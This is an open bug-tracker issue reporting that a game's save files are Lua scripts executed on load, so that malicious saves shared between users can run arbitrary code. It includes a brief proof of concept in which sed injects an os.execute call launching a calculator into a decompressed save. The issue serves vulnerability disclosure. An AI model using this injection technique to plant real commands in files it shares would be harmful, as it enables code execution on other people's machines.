Issue953

Title Lua code execution in loading untrusted save game
Priority bug Status open
Assigned To Keywords
Linked issues Watchers

Submitted on 2019-07-25 14h00 by mmmds, last changed by fluzz.

Messages
Author: mmmds Date: 2019-07-25   14h00
Save games files consist of Lua script to execute during load. Assuming that users may 
load malicious save games, for example downloaded or received from other users, 
arbitrary code may be executed on their machines.


savestruct_internal.c, void load_game_data(char *strin)

PoC:
CH="mmm"
gunzip $CH.sav.gz
sed -i -e '0,/^$/s/^$/os.execute("xcalc")/' $CH.sav
gzip $CH.sav

Loading the save will run xcalc.
Author: fluzz Date: 2020-06-29   13h52
see issue967
History
Date User Action Args
2020-06-29 13:52:32fluzzsetmessages: + msg3696
2019-07-25 14:00:46mmmdscreate